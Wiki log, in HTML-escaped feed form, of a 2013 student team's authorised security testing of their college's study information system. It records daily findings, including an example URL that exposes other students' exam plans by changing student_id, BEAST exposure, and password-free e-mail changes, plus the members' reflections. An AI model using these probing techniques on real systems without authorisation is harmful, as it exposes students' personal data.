&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
&#039;&#039;&#039;* Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;*Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;* Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;* Virtual Machines (VM VirtualBox .ova files)&#039;&#039;&#039;&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
We divided our roles already on the first day (which was 25 March). I was selected as a group leader (project manager), but we decided also that this is a democracy not a tyranny. :) I was happy that everybody showed up their good sides and told what they are good at.&lt;br /&gt;
&lt;br /&gt;
For me, some of the tools, which we have used, were already familiar (Apache, Linux, DVWA), because I have learned them before in school (Margus’ lectures) or at home by myself. But I tried to help others (in the practice and in our group) if there was any questions.&lt;br /&gt;
&lt;br /&gt;
The biggest improvement for me was the documentation part. I have documented my work before as well, but in such a big group as we had, it was first time experience for me. I got to know different ways how to do this, also now I value “same day feedback” more, because it is good to know what went well/bad on the same day, not the last one. :)&lt;br /&gt;
&lt;br /&gt;
As we all were technical background-persons, cooperation was very smooth and teamwork was very enjoyable. I learned a lot about teamwork and security threats in web and how to avoid them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants  (Due to having some experience already from before). Helping with sumorobot programming (Being from the robotics club). I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team. I learned alot about how to use and search information for security testing (XSS, CSRF and so on). I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on)&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
&#039;&#039;&#039;What I did:&#039;&#039;&#039; researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection. Practised attacks on the DVWA. Went through the OWASP ASVS document for possible shortcomings of the SIS. Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL. Documented my own and others&#039; work.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What I learned:&#039;&#039;&#039; a lot about web application vulnerabilities  - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures. Became more experienced in working in a multinational group with English as the working language. I learned how to document my work in order to keep track of the work of the team. I also learned what are the issues connected to the  preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did. First of all we all made a presentations about the OWASP TOP 10. Mine was about Insecure Direct Object References. Margus learned us to do the basic attack methods in DVWA: SQL injection, XSS and CSRF. After that I had to get familiar with the SIS. I tried all the basics on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
&lt;br /&gt;
I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn&#039;t work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
&lt;br /&gt;
I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* Tried to find out possible security holes from OIS site.&lt;br /&gt;
* Tested different attacking methods with DVWA&lt;br /&gt;
* SQL-injection tests into various places on OIS site.&lt;br /&gt;
* Tested some XSS methods&lt;br /&gt;
* Made presentation about Misconfigured Configuration.&lt;br /&gt;
* Prepared our presentation with other group members&lt;br /&gt;
* Spoke in daily summary&lt;br /&gt;
* Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What i learned?&#039;&#039;&#039;&lt;br /&gt;
* I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
* I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
* Working in international group&lt;br /&gt;
* How important documentation is&lt;br /&gt;
* Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* I studied hacking methods&lt;br /&gt;
* Tried some hacking methods with DVWA&lt;br /&gt;
* Iscanned website, try to find if there is some security risks&lt;br /&gt;
* Tried some SQL and XSS injections&lt;br /&gt;
* Made presentation of Sensitive Data Exposure&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What I learned?&#039;&#039;&#039;&lt;br /&gt;
* More than basics of how to hack?&lt;br /&gt;
* The most common hacking methods and how to use them.&lt;br /&gt;
* How to do SQL and XSS injections&lt;br /&gt;
* Basics of hacking tools&lt;br /&gt;
* How to find security risks&lt;br /&gt;
* How to work in international team.&lt;br /&gt;
* Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
&#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
* Searched for security holes in OIS student information site.&lt;br /&gt;
* Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
* Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
* Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
* Theory about OWASP TOP 10 threats&lt;br /&gt;
* How to do sql injections&lt;br /&gt;
* How to use Firefox tamperdata tool&lt;br /&gt;
* How to do cross-site scripting&lt;br /&gt;
* Completely understood what is use case and how to draw them&lt;br /&gt;
* How to monitor activities with Wireshark&lt;br /&gt;
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
</feed>